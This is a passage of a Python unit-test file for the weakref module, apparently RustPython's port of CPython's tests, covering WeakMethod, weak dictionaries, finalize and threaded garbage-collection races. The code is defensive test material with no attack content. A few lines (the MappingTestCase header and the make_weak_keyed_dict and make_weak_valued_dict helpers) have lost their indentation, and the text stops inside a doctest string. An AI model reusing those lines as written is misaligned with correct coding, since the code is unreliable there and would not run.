        r = weakref.WeakMethod(o.some_method)
        del C.some_method
        gc.collect()
        self.assertIs(r(), None)

    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_callback_when_object_dead(self):
        # Test callback behaviour when object dies first.
        C = self._subclass()
        calls = []
        def cb(arg):
            calls.append(arg)
        o = C(1)
        r = weakref.WeakMethod(o.some_method, cb)
        del o
        gc.collect()
        self.assertEqual(calls, [r])
        # Callback is only called once.
        C.some_method = Object.some_method
        gc.collect()
        self.assertEqual(calls, [r])

    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_callback_when_method_dead(self):
        # Test callback behaviour when method dies first.
        C = self._subclass()
        calls = []
        def cb(arg):
            calls.append(arg)
        o = C(1)
        r = weakref.WeakMethod(o.some_method, cb)
        del C.some_method
        gc.collect()
        self.assertEqual(calls, [r])
        # Callback is only called once.
        del o
        gc.collect()
        self.assertEqual(calls, [r])

    @support.cpython_only
    def test_no_cycles(self):
        # A WeakMethod doesn't create any reference cycle to itself.
        o = Object(1)
        def cb(_):
            pass
        r = weakref.WeakMethod(o.some_method, cb)
        wr = weakref.ref(r)
        del r
        self.assertIs(wr(), None)

    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_equality(self):
        # Live WeakMethods compare by (referent, function) equality;
        # dead ones fall back to identity (checked at the end).
        def _eq(a, b):
            self.assertTrue(a == b)
            self.assertFalse(a != b)
        def _ne(a, b):
            self.assertTrue(a != b)
            self.assertFalse(a == b)
        x = Object(1)
        y = Object(1)
        a = weakref.WeakMethod(x.some_method)
        b = weakref.WeakMethod(y.some_method)
        c = weakref.WeakMethod(x.other_method)
        d = weakref.WeakMethod(y.other_method)
        # Objects equal, same method
        _eq(a, b)
        _eq(c, d)
        # Objects equal, different method
        _ne(a, c)
        _ne(a, d)
        _ne(b, c)
        _ne(b, d)
        # Objects unequal, same or different method
        z = Object(2)
        e = weakref.WeakMethod(z.some_method)
        f = weakref.WeakMethod(z.other_method)
        _ne(a, e)
        _ne(a, f)
        _ne(b, e)
        _ne(b, f)
        del x, y, z
        gc.collect()
        # Dead WeakMethods compare by identity
        refs = a, b, c, d, e, f
        for q in refs:
            for r in refs:
                self.assertEqual(q == r, q is r)
                self.assertEqual(q != r, q is not r)

    def test_hashing(self):
        # Alive WeakMethods are hashable if the underlying object is
        # hashable.
        x = Object(1)
        y = Object(1)
        a = weakref.WeakMethod(x.some_method)
        b = weakref.WeakMethod(y.some_method)
        c = weakref.WeakMethod(y.other_method)
        # Since WeakMethod objects are equal, the hashes should be equal.
        self.assertEqual(hash(a), hash(b))
        ha = hash(a)
        # Dead WeakMethods retain their old hash value
        del x, y
        gc.collect()
        self.assertEqual(hash(a), ha)
        self.assertEqual(hash(b), ha)
        # If it wasn't hashed when alive, a dead WeakMethod cannot be hashed.
        self.assertRaises(TypeError, hash, c)
class MappingTestCase(TestBase):
COUNT = 10
    def check_len_cycles(self, dict_type, cons):
        # While an items() iterator is alive, removal of dead entries is
        # deferred; len() may therefore see at most one stale item.
        N = 20
        items = [RefCycle() for i in range(N)]
        dct = dict_type(cons(o) for o in items)
        # Keep an iterator alive
        it = dct.items()
        try:
            next(it)
        except StopIteration:
            pass
        del items
        gc.collect()
        n1 = len(dct)
        del it
        gc.collect()
        n2 = len(dct)
        # one item may be kept alive inside the iterator
        self.assertIn(n1, (0, 1))
        self.assertEqual(n2, 0)

    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_weak_keyed_len_cycles(self):
        self.check_len_cycles(weakref.WeakKeyDictionary, lambda k: (k, 1))

    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_weak_valued_len_cycles(self):
        self.check_len_cycles(weakref.WeakValueDictionary, lambda k: (1, k))
    def check_len_race(self, dict_type, cons):
        # Extended sanity checks for len() in the face of cyclic collection
        self.addCleanup(gc.set_threshold, *gc.get_threshold())
        # Vary the GC threshold so collection fires at different points.
        for th in range(1, 100):
            N = 20
            gc.collect(0)
            gc.set_threshold(th, th, th)
            items = [RefCycle() for i in range(N)]
            dct = dict_type(cons(o) for o in items)
            del items
            # All items will be collected at next garbage collection pass
            it = dct.items()
            try:
                next(it)
            except StopIteration:
                pass
            n1 = len(dct)
            del it
            n2 = len(dct)
            # len() must stay within sane bounds whatever the GC timing.
            self.assertGreaterEqual(n1, 0)
            self.assertLessEqual(n1, N)
            self.assertGreaterEqual(n2, 0)
            self.assertLessEqual(n2, n1)

    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_weak_keyed_len_race(self):
        self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))

    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_weak_valued_len_race(self):
        self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_weak_values(self):
        #
        # This exercises d.copy(), d.items(), d[], del d[], len(d).
        #
        dict, objects = self.make_weak_valued_dict()
        for o in objects:
            self.assertEqual(weakref.getweakrefcount(o), 1)
            self.assertIs(o, dict[o.arg],
                          "wrong object returned by weak dict!")
        items1 = list(dict.items())
        items2 = list(dict.copy().items())
        items1.sort()
        items2.sort()
        self.assertEqual(items1, items2,
                         "cloning of weak-valued dictionary did not work!")
        del items1, items2
        self.assertEqual(len(dict), self.COUNT)
        del objects[0]
        self.assertEqual(len(dict), self.COUNT - 1,
                         "deleting object did not cause dictionary update")
        del objects, o
        self.assertEqual(len(dict), 0,
                         "deleting the values did not clear the dictionary")
        # regression on SF bug #447152:
        dict = weakref.WeakValueDictionary()
        self.assertRaises(KeyError, dict.__getitem__, 1)
        dict[2] = C()
        # The anonymous C() dies immediately, so the entry vanishes.
        self.assertRaises(KeyError, dict.__getitem__, 2)

    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_weak_keys(self):
        #
        # This exercises d.copy(), d.items(), d[] = v, d[], del d[],
        # len(d), k in d.
        #
        dict, objects = self.make_weak_keyed_dict()
        for o in objects:
            self.assertEqual(weakref.getweakrefcount(o), 1,
                             "wrong number of weak references to %r!" % o)
            self.assertIs(o.arg, dict[o],
                          "wrong object returned by weak dict!")
        items1 = dict.items()
        items2 = dict.copy().items()
        self.assertEqual(set(items1), set(items2),
                         "cloning of weak-keyed dictionary did not work!")
        del items1, items2
        self.assertEqual(len(dict), self.COUNT)
        del objects[0]
        self.assertEqual(len(dict), (self.COUNT - 1),
                         "deleting object did not cause dictionary update")
        del objects, o
        self.assertEqual(len(dict), 0,
                         "deleting the keys did not clear the dictionary")
        o = Object(42)
        dict[o] = "What is the meaning of the universe?"
        self.assertIn(o, dict)
        self.assertNotIn(34, dict)
    def test_weak_keyed_iters(self):
        dict, objects = self.make_weak_keyed_dict()
        self.check_iters(dict)
        # Test keyrefs()
        refs = dict.keyrefs()
        self.assertEqual(len(refs), len(objects))
        objects2 = list(objects)
        for wr in refs:
            ob = wr()
            self.assertIn(ob, dict)
            self.assertIn(ob, dict)
            self.assertEqual(ob.arg, dict[ob])
            objects2.remove(ob)
        # Every strong object was reached through exactly one keyref.
        self.assertEqual(len(objects2), 0)
        # Test iterkeyrefs()
        objects2 = list(objects)
        self.assertEqual(len(list(dict.keyrefs())), len(objects))
        for wr in dict.keyrefs():
            ob = wr()
            self.assertIn(ob, dict)
            self.assertIn(ob, dict)
            self.assertEqual(ob.arg, dict[ob])
            objects2.remove(ob)
        self.assertEqual(len(objects2), 0)

    def test_weak_valued_iters(self):
        dict, objects = self.make_weak_valued_dict()
        self.check_iters(dict)
        # Test valuerefs()
        refs = dict.valuerefs()
        self.assertEqual(len(refs), len(objects))
        objects2 = list(objects)
        for wr in refs:
            ob = wr()
            self.assertEqual(ob, dict[ob.arg])
            self.assertEqual(ob.arg, dict[ob.arg].arg)
            objects2.remove(ob)
        self.assertEqual(len(objects2), 0)
        # Test itervaluerefs()
        objects2 = list(objects)
        self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
        for wr in dict.itervaluerefs():
            ob = wr()
            self.assertEqual(ob, dict[ob.arg])
            self.assertEqual(ob.arg, dict[ob.arg].arg)
            objects2.remove(ob)
        self.assertEqual(len(objects2), 0)
    def check_iters(self, dict):
        """Verify each iteration view visits every entry exactly once."""
        # item iterator:
        items = list(dict.items())
        for item in dict.items():
            items.remove(item)
        self.assertFalse(items, "items() did not touch all items")
        # key iterator, via __iter__():
        keys = list(dict.keys())
        for k in dict:
            keys.remove(k)
        self.assertFalse(keys, "__iter__() did not touch all keys")
        # key iterator, via iterkeys():
        keys = list(dict.keys())
        for k in dict.keys():
            keys.remove(k)
        self.assertFalse(keys, "iterkeys() did not touch all keys")
        # value iterator:
        values = list(dict.values())
        for v in dict.values():
            values.remove(v)
        self.assertFalse(values,
                         "itervalues() did not touch all values")
    def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
        # Destroying a referent mid-iteration must not crash the iterator;
        # the removal is committed once the iterator is gone.
        n = len(dict)
        it = iter(getattr(dict, iter_name)())
        next(it)  # Trigger internal iteration
        # Destroy an object
        del objects[-1]
        gc.collect()  # just in case
        # We have removed either the first consumed object, or another one
        self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
        del it
        # The removal has been committed
        self.assertEqual(len(dict), n - 1)

    def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
        # Check that we can explicitly mutate the weak dict without
        # interfering with delayed removal.
        # `testcontext` should create an iterator, destroy one of the
        # weakref'ed objects and then return a new key/value pair corresponding
        # to the destroyed object.
        with testcontext() as (k, v):
            self.assertNotIn(k, dict)
        with testcontext() as (k, v):
            self.assertRaises(KeyError, dict.__delitem__, k)
        self.assertNotIn(k, dict)
        with testcontext() as (k, v):
            self.assertRaises(KeyError, dict.pop, k)
        self.assertNotIn(k, dict)
        with testcontext() as (k, v):
            dict[k] = v
        self.assertEqual(dict[k], v)
        ddict = copy.copy(dict)
        with testcontext() as (k, v):
            dict.update(ddict)
        self.assertEqual(dict, ddict)
        with testcontext() as (k, v):
            dict.clear()
        self.assertEqual(len(dict), 0)

    def check_weak_del_and_len_while_iterating(self, dict, testcontext):
        # Check that len() works when both iterating and removing keys
        # explicitly through various means (.pop(), .clear()...), while
        # implicit mutation is deferred because an iterator is alive.
        # (each call to testcontext() should schedule one item for removal
        # for this test to work properly)
        o = Object(123456)
        with testcontext():
            n = len(dict)
            # Since underlying dict is ordered, first item is popped
            dict.pop(next(dict.keys()))
            self.assertEqual(len(dict), n - 1)
            dict[o] = o
            self.assertEqual(len(dict), n)
        # last item in objects is removed from dict in context shutdown
        with testcontext():
            self.assertEqual(len(dict), n - 1)
            # Then, (o, o) is popped
            dict.popitem()
            self.assertEqual(len(dict), n - 2)
        with testcontext():
            self.assertEqual(len(dict), n - 3)
            del dict[next(dict.keys())]
            self.assertEqual(len(dict), n - 4)
        with testcontext():
            self.assertEqual(len(dict), n - 5)
            dict.popitem()
            self.assertEqual(len(dict), n - 6)
        with testcontext():
            dict.clear()
            self.assertEqual(len(dict), 0)
        self.assertEqual(len(dict), 0)
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_weak_keys_destroy_while_iterating(self):
        # Issue #7105: iterators shouldn't crash when a key is implicitly removed
        dict, objects = self.make_weak_keyed_dict()
        self.check_weak_destroy_while_iterating(dict, objects, 'keys')
        self.check_weak_destroy_while_iterating(dict, objects, 'items')
        self.check_weak_destroy_while_iterating(dict, objects, 'values')
        self.check_weak_destroy_while_iterating(dict, objects, 'keyrefs')
        dict, objects = self.make_weak_keyed_dict()
        @contextlib.contextmanager
        def testcontext():
            try:
                it = iter(dict.items())
                next(it)
                # Schedule a key/value for removal and recreate it
                v = objects.pop().arg
                gc.collect()  # just in case
                yield Object(v), v
            finally:
                it = None  # should commit all removals
                gc.collect()
        self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
        # Issue #21173: len() fragile when keys are both implicitly and
        # explicitly removed.
        dict, objects = self.make_weak_keyed_dict()
        self.check_weak_del_and_len_while_iterating(dict, testcontext)

    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_weak_values_destroy_while_iterating(self):
        # Issue #7105: iterators shouldn't crash when a key is implicitly removed
        dict, objects = self.make_weak_valued_dict()
        self.check_weak_destroy_while_iterating(dict, objects, 'keys')
        self.check_weak_destroy_while_iterating(dict, objects, 'items')
        self.check_weak_destroy_while_iterating(dict, objects, 'values')
        self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
        self.check_weak_destroy_while_iterating(dict, objects, 'valuerefs')
        dict, objects = self.make_weak_valued_dict()
        @contextlib.contextmanager
        def testcontext():
            try:
                it = iter(dict.items())
                next(it)
                # Schedule a key/value for removal and recreate it
                k = objects.pop().arg
                gc.collect()  # just in case
                yield k, Object(k)
            finally:
                it = None  # should commit all removals
                gc.collect()
        self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
        dict, objects = self.make_weak_valued_dict()
        self.check_weak_del_and_len_while_iterating(dict, testcontext)
    def test_make_weak_keyed_dict_from_dict(self):
        # WeakKeyDictionary can be seeded from a plain dict.
        o = Object(3)
        dict = weakref.WeakKeyDictionary({o:364})
        self.assertEqual(dict[o], 364)

    def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
        # ...and from another WeakKeyDictionary (construction must not raise).
        o = Object(3)
        dict = weakref.WeakKeyDictionary({o:364})
        dict2 = weakref.WeakKeyDictionary(dict)
        self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o] = o.arg
return dict, objects
    def test_make_weak_valued_dict_from_dict(self):
        # WeakValueDictionary can be seeded from a plain dict.
        o = Object(3)
        dict = weakref.WeakValueDictionary({364:o})
        self.assertEqual(dict[364], o)

    def test_make_weak_valued_dict_from_weak_valued_dict(self):
        # ...and from another WeakValueDictionary (construction must not raise).
        o = Object(3)
        dict = weakref.WeakValueDictionary({364:o})
        dict2 = weakref.WeakValueDictionary(dict)
        self.assertEqual(dict[364], o)

    def test_make_weak_valued_dict_misc(self):
        # errors
        self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
        self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
        self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
        # special keyword arguments
        # These names must not be swallowed by the constructor's own signature.
        o = Object(3)
        for kw in 'self', 'dict', 'other', 'iterable':
            d = weakref.WeakValueDictionary(**{kw: o})
            self.assertEqual(list(d.keys()), [kw])
            self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o.arg] = o
return dict, objects
    def check_popitem(self, klass, key1, value1, key2, value2):
        # popitem() order is unspecified: accept either pair first.
        weakdict = klass()
        weakdict[key1] = value1
        weakdict[key2] = value2
        self.assertEqual(len(weakdict), 2)
        k, v = weakdict.popitem()
        self.assertEqual(len(weakdict), 1)
        if k is key1:
            self.assertIs(v, value1)
        else:
            self.assertIs(v, value2)
        k, v = weakdict.popitem()
        self.assertEqual(len(weakdict), 0)
        if k is key1:
            self.assertIs(v, value1)
        else:
            self.assertIs(v, value2)

    def test_weak_valued_dict_popitem(self):
        self.check_popitem(weakref.WeakValueDictionary,
                           "key1", C(), "key2", C())

    def test_weak_keyed_dict_popitem(self):
        self.check_popitem(weakref.WeakKeyDictionary,
                           C(), "value 1", C(), "value 2")
    def check_setdefault(self, klass, key, value1, value2):
        self.assertIsNot(value1, value2,
                         "invalid test"
                         " -- value parameters must be distinct objects")
        weakdict = klass()
        o = weakdict.setdefault(key, value1)
        self.assertIs(o, value1)
        self.assertIn(key, weakdict)
        self.assertIs(weakdict.get(key), value1)
        self.assertIs(weakdict[key], value1)
        # Second setdefault() must keep the first value, not replace it.
        o = weakdict.setdefault(key, value2)
        self.assertIs(o, value1)
        self.assertIn(key, weakdict)
        self.assertIs(weakdict.get(key), value1)
        self.assertIs(weakdict[key], value1)

    def test_weak_valued_dict_setdefault(self):
        self.check_setdefault(weakref.WeakValueDictionary,
                              "key", C(), C())

    def test_weak_keyed_dict_setdefault(self):
        self.check_setdefault(weakref.WeakKeyDictionary,
                              C(), "value 1", "value 2")
    def check_update(self, klass, dict):
        #
        # This exercises d.update(), len(d), d.keys(), k in d,
        # d.get(), d[].
        #
        weakdict = klass()
        weakdict.update(dict)
        self.assertEqual(len(weakdict), len(dict))
        for k in weakdict.keys():
            self.assertIn(k, dict, "mysterious new key appeared in weak dict")
            v = dict.get(k)
            self.assertIs(v, weakdict[k])
            self.assertIs(v, weakdict.get(k))
        for k in dict.keys():
            self.assertIn(k, weakdict, "original key disappeared in weak dict")
            v = dict[k]
            self.assertIs(v, weakdict[k])
            self.assertIs(v, weakdict.get(k))

    def test_weak_valued_dict_update(self):
        self.check_update(weakref.WeakValueDictionary,
                          {1: C(), 'a': C(), C(): C()})
        # errors
        self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
        d = weakref.WeakValueDictionary()
        self.assertRaises(TypeError, d.update, {}, {})
        self.assertRaises(TypeError, d.update, (), ())
        self.assertEqual(list(d.keys()), [])
        # special keyword arguments
        # These names must not be swallowed by update()'s own signature.
        o = Object(3)
        for kw in 'self', 'dict', 'other', 'iterable':
            d = weakref.WeakValueDictionary()
            d.update(**{kw: o})
            self.assertEqual(list(d.keys()), [kw])
            self.assertEqual(d[kw], o)

    def test_weak_keyed_dict_update(self):
        self.check_update(weakref.WeakKeyDictionary,
                          {C(): 1, C(): 2, C(): 3})
    def test_weak_keyed_delitem(self):
        # del through a live strong reference removes exactly one entry.
        d = weakref.WeakKeyDictionary()
        o1 = Object('1')
        o2 = Object('2')
        d[o1] = 'something'
        d[o2] = 'something'
        self.assertEqual(len(d), 2)
        del d[o1]
        self.assertEqual(len(d), 1)
        self.assertEqual(list(d.keys()), [o2])

    def test_weak_valued_delitem(self):
        d = weakref.WeakValueDictionary()
        o1 = Object('1')
        o2 = Object('2')
        d['something'] = o1
        d['something else'] = o2
        self.assertEqual(len(d), 2)
        del d['something']
        self.assertEqual(len(d), 1)
        self.assertEqual(list(d.items()), [('something else', o2)])
    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_weak_keyed_bad_delitem(self):
        d = weakref.WeakKeyDictionary()
        o = Object('1')
        # An attempt to delete an object that isn't there should raise
        # KeyError. It didn't before 2.3.
        self.assertRaises(KeyError, d.__delitem__, o)
        self.assertRaises(KeyError, d.__getitem__, o)
        # If a key isn't of a weakly referencable type, __getitem__ and
        # __setitem__ raise TypeError. __delitem__ should too.
        self.assertRaises(TypeError, d.__delitem__, 13)
        self.assertRaises(TypeError, d.__getitem__, 13)
        self.assertRaises(TypeError, d.__setitem__, 13, 13)

    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_weak_keyed_cascading_deletes(self):
        # SF bug 742860. For some reason, before 2.3 __delitem__ iterated
        # over the keys via self.data.iterkeys(). If things vanished from
        # the dict during this (or got added), that caused a RuntimeError.
        d = weakref.WeakKeyDictionary()
        mutate = False
        class C(object):
            def __init__(self, i):
                self.value = i
            def __hash__(self):
                return hash(self.value)
            def __eq__(self, other):
                if mutate:
                    # Side effect that mutates the dict, by removing the
                    # last strong reference to a key.
                    del objs[-1]
                return self.value == other.value
        objs = [C(i) for i in range(4)]
        for o in objs:
            d[o] = o.value
        del o  # now the only strong references to keys are in objs
        # Find the order in which iterkeys sees the keys.
        objs = list(d.keys())
        # Reverse it, so that the iteration implementation of __delitem__
        # has to keep looping to find the first object we delete.
        objs.reverse()
        # Turn on mutation in C.__eq__. The first time through the loop,
        # under the iterkeys() business the first comparison will delete
        # the last item iterkeys() would see, and that causes a
        # RuntimeError: dictionary changed size during iteration
        # when the iterkeys() loop goes around to try comparing the next
        # key. After this was fixed, it just deletes the last object *our*
        # "for o in obj" loop would have gotten to.
        mutate = True
        count = 0
        for o in objs:
            count += 1
            del d[o]
        self.assertEqual(len(d), 0)
        self.assertEqual(count, 2)
    def test_make_weak_valued_dict_repr(self):
        dict = weakref.WeakValueDictionary()
        self.assertRegex(repr(dict), '<WeakValueDictionary at 0x.*>')

    def test_make_weak_keyed_dict_repr(self):
        dict = weakref.WeakKeyDictionary()
        self.assertRegex(repr(dict), '<WeakKeyDictionary at 0x.*>')

    def test_threaded_weak_valued_setdefault(self):
        # Hammer setdefault() while a background thread repeatedly collects.
        d = weakref.WeakValueDictionary()
        with collect_in_thread():
            for i in range(100000):
                x = d.setdefault(10, RefCycle())
                self.assertIsNot(x, None)  # we never put None in there!
                del x

    def test_threaded_weak_valued_pop(self):
        # Hammer pop() while a background thread repeatedly collects.
        d = weakref.WeakValueDictionary()
        with collect_in_thread():
            for i in range(100000):
                d[10] = RefCycle()
                x = d.pop(10, 10)
                self.assertIsNot(x, None)  # we never put None in there!

    def test_threaded_weak_valued_consistency(self):
        # Issue #28427: old keys should not remove new values from
        # WeakValueDictionary when collecting from another thread.
        d = weakref.WeakValueDictionary()
        with collect_in_thread():
            for i in range(200000):
                o = RefCycle()
                d[10] = o
                # o is still alive, so the dict can't be empty
                self.assertEqual(len(d), 1)
                o = None  # lose ref
    def check_threaded_weak_dict_copy(self, type_, deepcopy):
        # `type_` should be either WeakKeyDictionary or WeakValueDictionary.
        # `deepcopy` should be either True or False.
        exc = []  # exceptions raised in the copier thread
        class DummyKey:
            def __init__(self, ctr):
                self.ctr = ctr
        class DummyValue:
            def __init__(self, ctr):
                self.ctr = ctr
        def dict_copy(d, exc):
            # Copier thread: record any exception instead of dying silently.
            try:
                if deepcopy is True:
                    _ = copy.deepcopy(d)
                else:
                    _ = d.copy()
            except Exception as ex:
                exc.append(ex)
        def pop_and_collect(lst):
            # Collector thread: drop strong refs in random order so entries
            # die while the copy is in progress.
            gc_ctr = 0
            while lst:
                i = random.randint(0, len(lst) - 1)
                gc_ctr += 1
                lst.pop(i)
                if gc_ctr % 10000 == 0:
                    gc.collect()  # just in case
        self.assertIn(type_, (weakref.WeakKeyDictionary, weakref.WeakValueDictionary))
        d = type_()
        keys = []
        values = []
        # Initialize d with many entries
        for i in range(70000):
            k, v = DummyKey(i), DummyValue(i)
            keys.append(k)
            values.append(v)
            d[k] = v
            del k
            del v
        t_copy = threading.Thread(target=dict_copy, args=(d, exc,))
        if type_ is weakref.WeakKeyDictionary:
            t_collect = threading.Thread(target=pop_and_collect, args=(keys,))
        else:  # weakref.WeakValueDictionary
            t_collect = threading.Thread(target=pop_and_collect, args=(values,))
        t_copy.start()
        t_collect.start()
        t_copy.join()
        t_collect.join()
        # Test exceptions
        if exc:
            raise exc[0]

    def test_threaded_weak_key_dict_copy(self):
        # Issue #35615: Weakref keys or values getting GC'ed during dict
        # copying should not result in a crash.
        self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, False)

    def test_threaded_weak_key_dict_deepcopy(self):
        # Issue #35615: Weakref keys or values getting GC'ed during dict
        # copying should not result in a crash.
        self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, True)

    def test_threaded_weak_value_dict_copy(self):
        # Issue #35615: Weakref keys or values getting GC'ed during dict
        # copying should not result in a crash.
        self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, False)

    def test_threaded_weak_value_dict_deepcopy(self):
        # Issue #35615: Weakref keys or values getting GC'ed during dict
        # copying should not result in a crash.
        self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, True)

    @support.cpython_only
    def test_remove_closure(self):
        # The internal _remove callback must not close over the dict itself.
        d = weakref.WeakValueDictionary()
        self.assertIsNone(d._remove.__closure__)
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
    """Check that WeakValueDictionary conforms to the mapping protocol"""
    # Class-level strong refs keep the reference mapping's values alive.
    __ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
    type2test = weakref.WeakValueDictionary
    def _reference(self):
        return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
    """Check that WeakKeyDictionary conforms to the mapping protocol"""
    # Class-level strong refs keep the reference mapping's keys alive.
    __ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
    type2test = weakref.WeakKeyDictionary
    def _reference(self):
        return self.__ref.copy()
class FinalizeTestCase(unittest.TestCase):
    """Tests for weakref.finalize."""

    class A:
        pass

    def _collect_if_necessary(self):
        # we create no ref-cycles so in CPython no gc should be needed
        if sys.implementation.name != 'cpython':
            support.gc_collect()

    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_finalize(self):
        def add(x,y,z):
            res.append(x + y + z)
            return x + y + z
        a = self.A()
        # Explicit call: runs once, then the finalizer is dead.
        res = []
        f = weakref.finalize(a, add, 67, 43, z=89)
        self.assertEqual(f.alive, True)
        self.assertEqual(f.peek(), (a, add, (67,43), {'z':89}))
        self.assertEqual(f(), 199)
        self.assertEqual(f(), None)
        self.assertEqual(f(), None)
        self.assertEqual(f.peek(), None)
        self.assertEqual(f.detach(), None)
        self.assertEqual(f.alive, False)
        self.assertEqual(res, [199])
        # detach(): unregisters without calling the callback.
        res = []
        f = weakref.finalize(a, add, 67, 43, 89)
        self.assertEqual(f.peek(), (a, add, (67,43,89), {}))
        self.assertEqual(f.detach(), (a, add, (67,43,89), {}))
        self.assertEqual(f(), None)
        self.assertEqual(f(), None)
        self.assertEqual(f.peek(), None)
        self.assertEqual(f.detach(), None)
        self.assertEqual(f.alive, False)
        self.assertEqual(res, [])
        # Implicit run when the referent is collected.
        res = []
        f = weakref.finalize(a, add, x=67, y=43, z=89)
        del a
        self._collect_if_necessary()
        self.assertEqual(f(), None)
        self.assertEqual(f(), None)
        self.assertEqual(f.peek(), None)
        self.assertEqual(f.detach(), None)
        self.assertEqual(f.alive, False)
        self.assertEqual(res, [199])

    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_arg_errors(self):
        def fin(*args, **kwargs):
            res.append((args, kwargs))
        a = self.A()
        # 'func' and 'obj' passed as keywords go to the callback, not to
        # finalize() itself.
        res = []
        f = weakref.finalize(a, fin, 1, 2, func=3, obj=4)
        self.assertEqual(f.peek(), (a, fin, (1, 2), {'func': 3, 'obj': 4}))
        f()
        self.assertEqual(res, [((1, 2), {'func': 3, 'obj': 4})])
        # Passing obj/func by keyword is deprecated.
        res = []
        with self.assertWarns(DeprecationWarning):
            f = weakref.finalize(a, func=fin, arg=1)
        self.assertEqual(f.peek(), (a, fin, (), {'arg': 1}))
        f()
        self.assertEqual(res, [((), {'arg': 1})])
        res = []
        with self.assertWarns(DeprecationWarning):
            f = weakref.finalize(obj=a, func=fin, arg=1)
        self.assertEqual(f.peek(), (a, fin, (), {'arg': 1}))
        f()
        self.assertEqual(res, [((), {'arg': 1})])
        self.assertRaises(TypeError, weakref.finalize, a)
        self.assertRaises(TypeError, weakref.finalize)

    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_order(self):
        # Finalizers for the same object run in LIFO (reverse-registration)
        # order when the object dies.
        a = self.A()
        res = []
        f1 = weakref.finalize(a, res.append, 'f1')
        f2 = weakref.finalize(a, res.append, 'f2')
        f3 = weakref.finalize(a, res.append, 'f3')
        f4 = weakref.finalize(a, res.append, 'f4')
        f5 = weakref.finalize(a, res.append, 'f5')
        # make sure finalizers can keep themselves alive
        del f1, f4
        self.assertTrue(f2.alive)
        self.assertTrue(f3.alive)
        self.assertTrue(f5.alive)
        self.assertTrue(f5.detach())
        self.assertFalse(f5.alive)
        f5()  # nothing because previously unregistered
        res.append('A')
        f3()  # => res.append('f3')
        self.assertFalse(f3.alive)
        res.append('B')
        f3()  # nothing because previously called
        res.append('C')
        del a
        self._collect_if_necessary()
        # => res.append('f4')
        # => res.append('f2')
        # => res.append('f1')
        self.assertFalse(f2.alive)
        res.append('D')
        f2()  # nothing because previously called by gc
        expected = ['A', 'f3', 'B', 'C', 'f4', 'f2', 'f1', 'D']
        self.assertEqual(res, expected)

    # TODO: RUSTPYTHON
    @unittest.expectedFailure
    def test_all_freed(self):
        # we want a weakrefable subclass of weakref.finalize
        class MyFinalizer(weakref.finalize):
            pass
        a = self.A()
        res = []
        def callback():
            res.append(123)
        f = MyFinalizer(a, callback)
        wr_callback = weakref.ref(callback)
        wr_f = weakref.ref(f)
        del callback, f
        # The registry keeps the finalizer and its callback alive...
        self.assertIsNotNone(wr_callback())
        self.assertIsNotNone(wr_f())
        del a
        self._collect_if_necessary()
        # ...until the referent dies; then everything is released.
        self.assertIsNone(wr_callback())
        self.assertIsNone(wr_f())
        self.assertEqual(res, [123])

    @classmethod
    def run_in_child(cls):
        # Executed in a subprocess by test_atexit; exercises atexit-time
        # finalizer ordering, including one that registers another finalizer
        # and one that raises.
        def error():
            # Create an atexit finalizer from inside a finalizer called
            # at exit. This should be the next to be run.
            g1 = weakref.finalize(cls, print, 'g1')
            print('f3 error')
            1/0
        # cls should stay alive till atexit callbacks run
        f1 = weakref.finalize(cls, print, 'f1', _global_var)
        f2 = weakref.finalize(cls, print, 'f2', _global_var)
        f3 = weakref.finalize(cls, error)
        f4 = weakref.finalize(cls, print, 'f4', _global_var)
        assert f1.atexit == True
        f2.atexit = False  # f2 must NOT run at exit
        assert f3.atexit == True
        assert f4.atexit == True

    def test_atexit(self):
        prog = ('from test.test_weakref import FinalizeTestCase;'+
                'FinalizeTestCase.run_in_child()')
        rc, out, err = script_helper.assert_python_ok('-c', prog)
        out = out.decode('ascii').splitlines()
        self.assertEqual(out, ['f4 foobar', 'f3 error', 'g1', 'f1 foobar'])
        self.assertTrue(b'ZeroDivisionError' in err)
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referencable
